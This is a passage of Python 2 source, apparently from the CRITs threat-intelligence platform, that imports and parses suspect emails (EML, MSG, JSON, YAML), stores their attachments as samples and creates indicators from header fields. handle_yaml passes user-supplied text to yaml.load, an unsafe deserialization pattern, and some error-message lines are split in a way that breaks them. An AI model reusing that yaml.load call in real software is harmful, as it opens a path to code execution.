from crits.core.crits_mongoengine import json_handler, create_embedded_source
from crits.core.crits_mongoengine import EmbeddedCampaign
from crits.core.data_tools import clean_dict
from crits.core.exceptions import ZipFileError
from crits.core.handlers import class_from_id
from crits.core.handlers import build_jtable, jtable_ajax_list, jtable_ajax_delete
from crits.core.handlers import csv_export
from crits.core.user_tools import user_sources, is_admin, is_user_favorite
from crits.core.user_tools import is_user_subscribed
from crits.domains.handlers import get_valid_root_domain
from crits.emails.email import Email
from crits.indicators.handlers import handle_indicator_ind
from crits.indicators.indicator import Indicator
from crits.notifications.handlers import remove_user_from_notification
from crits.samples.handlers import handle_file, handle_uploaded_file, mail_sample
from crits.services.handlers import run_triage
from crits.vocabulary.relationships import RelationshipTypes
from crits.vocabulary.indicators import (
IndicatorTypes,
IndicatorAttackTypes,
IndicatorThreatTypes
)
def create_email_field_dict(field_name,
field_type,
field_value,
field_displayed_text,
is_allow_create_indicator,
is_href,
is_editable,
is_email_list,
is_splunk,
href_search_field=None):
"""
Generates a 1:1 dictionary from all of the input fields.
Returns:
A dictionary of all the input fields, with the input parameter names
each as a key and its associated value as the value pair.
"""
return {"field_name": field_name,
"field_type": field_type,
"field_value": field_value,
"field_displayed_text": field_displayed_text,
"is_allow_create_indicator": is_allow_create_indicator,
"is_href": is_href,
"is_editable": is_editable,
"is_email_list": is_email_list,
"is_splunk": is_splunk,
"href_search_field": href_search_field
}
def generate_email_csv(request):
"""
Generate a CSV file of the Email information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request, Email)
return response
def get_email_formatted(email_id, analyst, data_format):
"""
Format an email in YAML or JSON.
:param email_id: The ObjectId of the email.
:type email_id: str
:param analyst: The user requesting the data.
:type analyst: str
:param data_format: The format you want the data in.
:type data_format: "json" or "yaml"
:returns: :class:`django.http.HttpResponse`
"""
sources = user_sources(analyst)
email = Email.objects(id=email_id, source__name__in=sources).first()
if not email:
return HttpResponse(json.dumps({}), content_type="application/json")
exclude = [
"created",
"source",
"relationships",
"schema_version",
"campaign",
"analysis",
"bucket_list",
"ticket",
"releasability",
"unsupported_attrs",
"status",
"objects",
"modified",
"analyst",
"_id",
"to",
"cc",
"raw_headers",
]
if data_format == "yaml":
data = {"email_yaml": email.to_yaml(exclude=exclude)}
elif data_format == "json":
data = {"email_yaml": email.to_json(exclude=exclude)}
else:
data = {"email_yaml": {}}
return HttpResponse(json.dumps(data), content_type="application/json")
def get_email_detail(email_id, analyst):
"""
Generate the email details page.
:param email_id: The ObjectId of the email.
:type email_id: str
:param analyst: The user requesting the data.
:type analyst: str
:returns: tuple
"""
template = None
sources = user_sources(analyst)
email = Email.objects(id=email_id, source__name__in=sources).first()
if not email:
template = "error.html"
args = {'error': "ID does not exist or insufficient privs for source"}
else:
email.sanitize(username="%s" % analyst, sources=sources)
update_data_form = EmailYAMLForm(analyst)
campaign_form = CampaignForm()
download_form = DownloadFileForm(initial={"obj_type": 'Email',
"obj_id":email_id})
# remove pending notifications for user
remove_user_from_notification("%s" % analyst, email.id, 'Email')
# subscription
subscription = {
'type': 'Email',
'id': email.id,
'subscribed': is_user_subscribed("%s" % analyst, 'Email',
email.id),
}
# objects
objects = email.sort_objects()
# relationships
relationships = email.sort_relationships("%s" % analyst, meta=True)
# relationship
relationship = {
'type': 'Email',
'value': email.id
}
# comments
comments = {'comments': email.get_comments(),
'url_key': email.id}
#screenshots
screenshots = email.get_screenshots(analyst)
# favorites
favorite = is_user_favorite("%s" % analyst, 'Email', email.id)
email_fields = []
email_fields.append(create_email_field_dict(
"from_address", # field_name
IndicatorTypes.EMAIL_FROM, # field_type
email.from_address, # field_value
"From", # field_displayed_text
# is_allow_create_indicator
# is_href
# is_editable
# is_email_list
# is_splunk
True, True, True, False, True,
href_search_field="from" # href_search_field
))
email_fields.append(create_email_field_dict(
"sender",
IndicatorTypes.EMAIL_SENDER,
email.sender,
"Sender",
True, True, True, False, True,
href_search_field="sender"
))
email_fields.append(create_email_field_dict(
"Email To",
None,
email.to,
"To",
False, True, True, True, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"cc",
"Email CC",
email.cc,
"CC",
False, True, True, True, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"date",
"Email Date",
email.date,
"Date",
False, False, True, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"isodate",
"Email ISODate",
email.isodate,
"ISODate",
False, False, False, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"subject",
IndicatorTypes.EMAIL_SUBJECT,
email.subject,
"Subject",
True, True, True, False, False,
href_search_field="subject"
))
email_fields.append(create_email_field_dict(
"x_mailer",
IndicatorTypes.EMAIL_X_MAILER,
email.x_mailer,
"X-Mailer",
True, True, True, False, False,
href_search_field="x_mailer"
))
email_fields.append(create_email_field_dict(
"reply_to",
IndicatorTypes.EMAIL_REPLY_TO,
email.reply_to,
"Reply To",
True, True, True, False, False,
href_search_field="reply_to"
))
email_fields.append(create_email_field_dict(
"message_id",
IndicatorTypes.EMAIL_MESSAGE_ID,
email.message_id,
"Message ID",
True, False, True, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"helo",
IndicatorTypes.EMAIL_HELO,
email.helo,
"helo",
True, True, True, False, False,
href_search_field="helo"
))
email_fields.append(create_email_field_dict(
"boundary",
IndicatorTypes.EMAIL_BOUNDARY,
email.boundary,
"Boundary",
True, False, True, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"originating_ip",
IndicatorTypes.EMAIL_ORIGINATING_IP,
email.originating_ip,
"Originating IP",
True, True, True, False, True,
href_search_field="originating_ip"
))
email_fields.append(create_email_field_dict(
"x_originating_ip",
IndicatorTypes.EMAIL_X_ORIGINATING_IP,
email.x_originating_ip,
"X-Originating IP",
True, True, True, False, True,
href_search_field="x_originating_ip"
))
# analysis results
service_results = email.get_analysis_results()
args = {'objects': objects,
'email_fields': email_fields,
'relationships': relationships,
'comments': comments,
'favorite': favorite,
'relationship': relationship,
'screenshots': screenshots,
'subscription': subscription,
'email': email,
'campaign_form': campaign_form,
'download_form': download_form,
'update_data_form': update_data_form,
'admin': is_admin(analyst),
'service_results': service_results,
'rt_url': settings.RT_URL}
return template, args
def generate_email_jtable(request, option):
"""
Generate email jtable.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
obj_type = Email
type_ = "email"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type,
details_url,
details_url_key,
request,
includes=fields)
if 'Records' in response:
for doc in response['Records']:
if doc['to']:
doc['recip'] = len(doc['to'].split(','))
else:
doc['recip'] = 0
if doc['cc']:
doc['recip'] += len(doc['cc'].split(','))
return HttpResponse(json.dumps(response, default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type, request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Emails",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.%ss.views.%ss_listing' % (type_,
type_), args=('jtlist',)),
'deleteurl': reverse('crits.%ss.views.%ss_listing' % (type_,
type_), args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts, request)
jtable['toolbar'] = [
{
'tooltip': "'All Emails'",
'text': "'All'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'New Emails'",
'text': "'New'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'New'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'In Progress Emails'",
'text': "'In Progress'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'In Progress'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Analyzed Emails'",
'text': "'Analyzed'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'Analyzed'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Deprecated Emails'",
'text': "'Deprecated'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'Deprecated'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Add Email'",
'text': "'Add Email'",
'click': "function () {$('#new-email-fields').click()}",
},
{
'tooltip': "'Upload Outlook Email'",
'text': "'Upload .msg'",
'click': "function () {$('#new-email-outlook').click()}",
},
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def handle_email_fields(data, analyst, method):
"""
Take email fields and convert them into an email object.
:param data: The fields to include in the email.
:type data: dict
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:returns: dict with keys:
"status" (boolean),
"object" The email object if successful,
"reason" (str).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None
}
# Date and source are the only required ones.
# If there is no campaign confidence, default it to low.
# Remove these items from data so they are not added when merged.
sourcename = data.get('source', None)
del data['source']
if data.get('source_method', None):
method = method + " - " + data.get('source_method', None)
try:
del data['source_method']
except:
pass
reference = data.get('source_reference', None)
try:
del data['source_reference']
except:
pass
bucket_list = data.get('bucket_list', None)
try:
del data['bucket_list']
except:
pass
ticket = data.get('ticket', None)
try:
del data['ticket']
except:
pass
campaign = data.get('campaign', None)
try:
del data['campaign']
except:
pass
confidence = data.get('campaign_confidence', 'low')
try:
del data['campaign_confidence']
except:
pass
try:
for x in ('cc', 'to'):
y = data.get(x, None)
if isinstance(y, basestring):
if len(y) > 0:
tmp_y = y.split(',')
y_final = [ty.strip() for ty in tmp_y if len(ty.strip()) > 0]
data[x] = y_final
else:
data[x] = []
elif not y:
data[x] = []
except:
pass
new_email = Email()
new_email.merge(data)
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
new_email.source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
if campaign:
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
try:
new_email.save(username=analyst)
new_email.reload()
run_triage(new_email, analyst)
result['object'] = new_email
result['status'] = True
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
return result
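# Hedged illustration (editor's addition, values are made up): a minimal field
# dict accepted by handle_email_fields(). Per the comment in the function body,
# only source and date are required; campaign confidence falls back to 'low'.
#   handle_email_fields({'source': 'example_feed',
#                        'date': 'Mon, 01 Jan 2001 00:00:00 -0500',
#                        'from_address': 'spoofed@example.com',
#                        'subject': 'Invoice attached'},
#                       analyst='analyst1', method='Upload')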
def handle_json(data, sourcename, reference, analyst, method,
save_unsupported=True, campaign=None, confidence=None,
bucket_list=None, ticket=None):
"""
Take email in JSON and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param save_unsupported: Save any unsupported fields instead of ignoring.
:type save_unsupported: boolean
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"object" The email object if successful,
"data" the converted email data.
"reason" (str).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None
}
try:
converted = json.loads(data)
if isinstance(converted, dict) == False:
raise
except Exception, e:
result["reason"] = "Cannot convert data to JSON.\n<br /><pre>%s</pre>" % str(e)
return result
result['data'] = converted
new_email = dict_to_email(result['data'], save_unsupported=save_unsupported)
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
if campaign:
if not confidence:
confidence = "low"
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
result['object'] = new_email
result['object'].source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
try:
result['object'].save(username=analyst)
result['object'].reload()
run_triage(result['object'], analyst)
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
result['status'] = True
return result
# if email_id is provided it is the existing email id to modify.
def handle_yaml(data, sourcename, reference, analyst, method, email_id=None,
save_unsupported=True, campaign=None, confidence=None,
bucket_list=None, ticket=None):
"""
Take email in YAML and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param email_id: The ObjectId of the existing email to update.
:type email_id: str
:param save_unsupported: Save any unsupported fields instead of ignoring.
:type save_unsupported: boolean
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"object" The email object if successful,
"data" the converted email data.
"reason" (str).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None
}
try:
converted = yaml.load(data)
if isinstance(converted, dict) == False:
raise
except Exception, e:
result["reason"] = "Cannot convert data to YAML.\n<br /><pre>%s</pre>" % str(e)
return result
result['data'] = converted
new_email = dict_to_email(result['data'], save_unsupported=save_unsupported)
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
if campaign:
if not confidence:
confidence = "low"
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
result['object'] = new_email
if email_id:
old_email = class_from_id('Email', email_id)
if not old_email:
result['reason'] = "Unknown email_id."
return result
# Can not merge with a source?
# For now, just save the original source and put it back after merge.
saved_source = old_email.source
# XXX: If you use the "Edit YAML" button and edit the "from" field
# it gets put into the new email object in dict_to_email() correctly
# but calling to_dict() on that object results in a 'from' key being
# put into the dictionary. Thus, the following line will result in
# your new 'from' field being stuffed into unsupported_attrs.
# old_email.merge(result['object'].to_dict(), True)
# To work around this (for now) convert the new email object to a
# dictionary and manually replace 'from' with the from_address
# property.
tmp = result['object'].to_dict()
if 'from' in tmp:
tmp['from_address'] = result['object'].from_address
old_email.merge(tmp, True)
old_email.source = saved_source
try:
old_email.save(username=analyst)
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
return result
else:
result['object'].source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
try:
result['object'].save(username=analyst)
result['object'].reload()
run_triage(result['object'], analyst)
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
return result
result['status'] = True
return result
def handle_msg(data, sourcename, reference, analyst, method, password='',
campaign=None, confidence=None, bucket_list=None, ticket=None):
"""
Take email in MSG and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param password: The password for the attachment.
:type password: str
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"obj_id" The email ObjectId if successful,
"message" (str)
"reason" (str).
"""
response = {'status': False}
result = parse_ole_file(data)
if result.has_key('error'):
response['reason'] = result['error']
return response
result['email']['source'] = sourcename
result['email']['source_reference'] = reference
result['email']['campaign'] = campaign
result['email']['campaign_confidence'] = confidence
result['email']['bucket_list'] = bucket_list
result['email']['ticket'] = ticket
if result['email'].has_key('date'):
result['email']['isodate'] = date_parser(result['email']['date'],
fuzzy=True)
obj = handle_email_fields(result['email'], analyst, method)
if not obj["status"]:
response['reason'] = obj['reason']
return response
email = obj.get('object')
# Process attachments and upload as samples
attach_messages = []
for file in result['attachments']:
type_ = file.get('type', '')
if 'pkcs7' not in type_:
mimetype = magic.from_buffer(file.get('data', ''), mime=True)
if mimetype is None:
file_format = 'raw'
elif 'application/zip' in mimetype:
file_format = 'zip'
elif 'application/x-rar' in mimetype:
file_format = 'rar'
else:
file_format = 'raw'
try:
cleaned_data = {'file_format': file_format,
'password': password}
r = create_email_attachment(email, cleaned_data, analyst, sourcename,
method, reference, campaign, confidence,
"", "", file.get('data', ''), file.get('name', ''))
if 'success' in r:
if not r['success']:
attach_messages.append("%s: %s" % (file.get('name', ''),
r['message']))
else:
attach_messages.append("%s: Added Successfully!" % file.get('name', ''))
except BaseException:
error_message = 'The email uploaded successfully, but there was an error\
uploading the attachment ' + file['name'] + '\n\n' + str(sys.exc_info())
response['reason'] = error_message
return response
else:
attach_messages.append('%s: Cannot decrypt attachment (pkcs7).' % file.get('name', ''))
if len(attach_messages):
response['message'] = '<br/>'.join(attach_messages)
response['status'] = True
response['obj_id'] = obj['object'].id
return response
def handle_pasted_eml(data, sourcename, reference, analyst, method,
parent_type=None, parent_id=None, campaign=None,
confidence=None, bucket_list=None, ticket=None):
"""
Take email in EML and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param parent_type: The top-level object type of the parent.
:type parent_type: str
:param parent_id: The ObjectId of the parent.
:type parent_id: str
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"reason" (str),
"object" The email object if successful,
"data" the converted email data,
"attachments" (dict).
"""
# Try to fix headers where we lost whitespace indents
# Split by newline, parse/fix headers, join by newline
hfieldre = re.compile('^\S+:\s')
boundaryre = re.compile('boundary="?([^\s"\']+)"?')
emldata = []
boundary = None
isbody = False
if not isinstance(data, str):
data = data.read()
for line in data.split("\n"):
# We match the regex for a boundary definition
m = boundaryre.search(line)
if m:
boundary = m.group(1)
# content boundary exists and we reached it
if boundary and boundary in line:
isbody = True
        # If we are not in the body and see something that does not look
# like a valid header field, prepend a space to attach this line
# to the previous header we found
if not isbody and not hfieldre.match(line):
line = " %s" % line
emldata.append(line)
emldata = "\n".join(emldata)
return handle_eml(emldata, sourcename, reference, analyst, method, parent_type,
parent_id, campaign, confidence, bucket_list, ticket)
def handle_eml(data, sourcename, reference, analyst, method, parent_type=None,
parent_id=None, campaign=None, confidence=None, bucket_list=None,
ticket=None):
"""
Take email in EML and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param parent_type: The top-level object type of the parent.
:type parent_type: str
:param parent_id: The ObjectId of the parent.
:type parent_id: str
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"reason" (str),
"object" The email object if successful,
"data" the converted email data,
"attachments" (dict).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None,
'attachments': {}
}
if not sourcename:
result['reason'] = "Missing source information."
return result
msg_import = {'raw_header': ''}
reImap = re.compile(r"(\*\s\d+\sFETCH\s.+?\r\n)(.+)\).*?OK\s(UID\sFETCH\scompleted|Success)", re.M | re.S)
# search for SMTP dialog
start = data.find("DATA")
end = data.find("\x0d\x0a\x2e\x0d\x0a")
if start >= 0 and end >= 0:
premail = data[:start]
mailfrom = None
rcptto = None
for preheaders in premail.splitlines():
mfpos = preheaders.find("MAIL FROM")
if mfpos > -1:
try:
mailfrom = unicode(preheaders[mfpos + 10:])
except UnicodeDecodeError:
mailfrom = unicode(preheaders[mfpos + 10:], errors="replace")
rcpos = preheaders.find("RCPT TO")
if rcpos > -1:
try:
rcptto = unicode(preheaders[rcpos + 9:])
except UnicodeDecodeError:
rcptto = unicode(preheaders[rcpos + 9:], errors="replace")
if mailfrom:
msg_import['mailfrom'] = mailfrom
if rcptto:
msg_import['rcptto'] = rcptto
mail1 = data[start + 6:end]
stripped_mail = ""
for line in mail1.splitlines(True):
# Strip SMTP response codes. Some people like to grab a single
# TCP session in wireshark and save it to disk and call it an EML.
if line[:4] in ['200 ', '211 ', '214 ', '220 ', '221 ', '250 ',
'250-', '251 ', '354 ', '421 ', '450 ', '451 ',
'452 ', '500 ', '501 ', '502 ', '503 ', '504 ',
'521 ', '530 ', '550 ', '551 ', '552 ', '553 ',
'554 ']:
continue
stripped_mail += line
else:
# No SMTP dialog found, search for IMAP markers
match = reImap.search(data)
if match:
stripped_mail = match.groups()[1]
else:
stripped_mail = data
msg = eml.message_from_string(str(stripped_mail))
if not msg.items():
result['reason'] = """Could not parse email. Possibly the input does
not conform to a Internet Message style headers
and header continuation lines..."""
return result
# clean up headers
for d in msg.items():
cleand = ''.join([x for x in d[1] if (ord(x) < 127 and ord(x) >= 32)])
msg_import[d[0].replace(".",
"").replace("$",
"").replace("\x00",
"").replace("-",
"_").lower()] = cleand
msg_import['raw_header'] += d[0] + ": " + cleand + "\n"
# Rip out anything that looks like an email address and store it.
if 'to' in msg_import:
to_list = re.findall(r'[\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}',
msg_import['to'])
msg_import['to'] = []
msg_import['to'] = [i for i in to_list if i not in msg_import['to']]
# Parse the body of the email
msg_import["raw_body"] = ""
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get_content_maintype() == "text":
content = part.get_payload(decode=True)
if content:
try:
message_part = unicode(content)
except UnicodeDecodeError:
message_part = unicode(content, errors="replace")
msg_import["raw_body"] = msg_import["raw_body"] + \
message_part + "\n"
# Check for attachment in mail parts
filename = part.get_filename()
attach = part.get_payload(decode=True)
if attach is not None and len(attach):
md5 = hashlib.md5(attach).hexdigest()
mtype = magic.from_buffer(attach)
if filename is not None:
try:
filename = unicode(filename)
except UnicodeDecodeError:
filename = unicode(filename, errors="replace")
else:
filename = md5
result['attachments'][md5] = {
'filename': filename,
'magic': mtype,
'blob': attach
}
result['data'] = msg_import
new_email = dict_to_email(result['data'])
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
if campaign:
if not confidence:
confidence = "low"
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
result['object'] = new_email
result['object'].source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
# Save the Email first, so we can have the id to use to create
# relationships.
if not result['object'].date:
result['object'].date = None
try:
result['object'].save(username=analyst)
result['object'].reload()
run_triage(result['object'], analyst)
except Exception, e:
result['reason'] = "Failed1 to save email.\n<br /><pre>" + \
str(e) + "</pre>"
return result
# Relate the email back to the pcap, if it came from PCAP.
if parent_id and parent_type:
rel_item = class_from_id(parent_type, parent_id)
if rel_item:
rel_type = RelationshipTypes.CONTAINED_WITHIN
ret = result['object'].add_relationship(rel_item,
rel_type,
analyst=analyst,
get_rels=False)
if not ret['success']:
result['reason'] = "Failed to create relationship.\n<br /><pre>"
+ result['message'] + "</pre>"
return result
# Save the email again since it now has a new relationship.
try:
result['object'].save(username=analyst)
except Exception, e:
result['reason'] = "Failed to save email.\n<br /><pre>"
+ str(e) + "</pre>"
return result
for (md5_, attachment) in result['attachments'].items():
if handle_file(attachment['filename'],
attachment['blob'],
sourcename,
method='eml_processor',
reference=reference,
related_id=result['object'].id,
user=analyst,
md5_digest=md5_,
related_type='Email',
campaign=campaign,
confidence=confidence,
bucket_list=bucket_list,
ticket=ticket,
relationship=RelationshipTypes.CONTAINED_WITHIN) == None:
result['reason'] = "Failed to save attachment.\n<br /><pre>"
+ md5_ + "</pre>"
return result
result['status'] = True
return result
def dict_to_email(d, save_unsupported=True):
"""
Convert a dictionary to an email.
Standardize all key names:
- Convert hyphens and whitespace to underscores
- Remove all non-alphanumeric and non-underscore characters.
- Combine multiple underscores.
- convert alpha characters to lowercase.
:param d: The dictionary to convert.
:type d: dict
:param save_unsupported: Whether or not to save unsupported fields.
:type save_unsupported: boolean
:returns: :class:`crits.email.email.Email`
"""
for key in d:
newkey = re.sub('[\s-]', '_', key)
newkey = re.sub('[\W]', '', newkey)
newkey = re.sub('_+', '_', newkey)
newkey = newkey.lower()
if key != newkey:
d[newkey] = d[key]
del d[key]
# Remove keys which we don't want the user to modify via YAML.
keys = ('schema_version', 'comments', 'objects', 'campaign',
'relationships', 'source', 'releasability', 'analysis',
'bucket_list', 'ticket', 'objects')
clean_dict(d, keys)
if 'x_originating_ip' in d and d['x_originating_ip']:
d['x_originating_ip'] = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
d['x_originating_ip'])[0]
if 'date' in d and d['date']:
if isinstance(d['date'], datetime.datetime):
d['isodate'] = d['date']
d['date'] = str(d['date'])
else:
d['isodate'] = date_parser(d['date'], fuzzy=True)
if 'to' in d and isinstance(d['to'], basestring) and len(d['to']) > 0:
d['to'] = [d['to']]
if 'cc' in d and isinstance(d['cc'], basestring) and len(d['cc']) > 0:
d['cc'] = [d['cc']]
if 'from' in d:
d['from_address'] = d['from']
del d['from']
if save_unsupported:
for (k, v) in d.get('unsupported_attrs', {}).items():
d[k] = v
if 'unsupported_attrs' in d:
del d['unsupported_attrs']
crits_email = Email()
crits_email.merge(d)
return crits_email
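# Hedged example (editor's addition): a hypothetical, never-called helper that
# sketches how dict_to_email() is used; the sample values are made up.
def _example_dict_to_email():
    raw = {'From': 'alice@example.com', 'X-Mailer': 'Foo 1.0', 'Subject': 'hi'}
    # Keys are normalized (hyphens to underscores, lowercased); 'From' ends up
    # on from_address and 'X-Mailer' on the x_mailer attribute.
    return dict_to_email(raw)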
def update_email_header_value(email_id, type_, value, analyst):
"""
Update a header value for an email.
:param email_id: The ObjectId of the email to update.
:type email_id: str
:param type_: The header type.
:type type_: str
:param value: The header value.
:type value: str
:param analyst: The user updating the header field.
:type analyst: str
:returns: dict with keys:
"success" (boolean),
"message" (str),
"isodate" (datetime.datetime) if the header field was "date".
"""
if type_ in ('to', 'cc'):
bad_chars = "<>^&(){}[]!#$%=+;:'/\|?~`"
if any((bad_char in value) for bad_char in bad_chars):
return {'success': False, 'message': "Invalid characters in list"}
email = Email.objects(id=email_id).first()
if email:
try:
if type_ in ('to', 'cc'):
vlist = value.split(",")
vfinal = []
for v in vlist:
if len(v.strip()) > 0:
vfinal.append(v.strip())
value = vfinal
setattr(email, type_, value)
if type_ == 'date':
isodate = date_parser(value, fuzzy=True)
email.isodate = isodate
email.save(username=analyst)
if type_ == 'date':
result = {'success': True,
'message': "Successfully updated email",
'isodate': email.isodate.strftime("%Y-%m-%d %H:%M:%S.%f")}
elif type_ in ('to', 'cc'):
links = ""
for v in value:
# dirty ugly hack to "urlencode" the resulting URL
url = reverse('crits.targets.views.target_info',
args=[v]).replace('@', '%40')
links += '<a href="%s">%s</a>, ' % (url, v)
result = {'success': True,
'message': "Successfully updated email",
'links': links}
else:
result = {'success': True,
'message': "Successfully updated email"}
except Exception, e:
result = {'success': False, 'message': e}
else:
result = {'success': False, 'message': "Could not find email"}
return result
def create_indicator_from_header_field(email, header_field, ind_type,
analyst, request):
"""
Create an indicator out of the header field.
:param email: The email to get the header from.
:type email: :class:`crits.emails.email.Email`
:param header_field: The header type.
:type header_field: str
:param ind_type: The Indicator type to use.
:type ind_type: str
:param analyst: The user updating the header field.
:type analyst: str
:param request: The Django request.
:type request: :class:`django.http.HttpRequest`
:returns: dict with keys:
"success" (boolean),
"message" (str),
"""
value = getattr(email, header_field)
# Check to make sure the "value" is valid
if value == None or value.strip() == "":
result = {
'success': False,
'message': "Can't create indicator from email field [" +
str(header_field) + "] with an empty value field",
}
return result
elif ind_type == None or ind_type.strip() == "":
result = {
'success': False,
'message': "Can't create indicator from email field " +
"with an empty type field",
}
return result
newindicator = handle_indicator_ind(value,
email.source,
ind_type,
threat_type=IndicatorThreatTypes.UNKNOWN,
attack_type=IndicatorAttackTypes.UNKNOWN,
analyst=analyst)
if newindicator.get('objectid'):
indicator = Indicator.objects(id=newindicator['objectid']).first()
results = email.add_relationship(indicator,
RelationshipTypes.RELATED_TO,
analyst=analyst,
get_rels=True)
if results['success']:
email.save(username=analyst)
relationship = {'type': 'Email', 'value': email.id}
message = render_to_string('relationships_listing_widget.html',
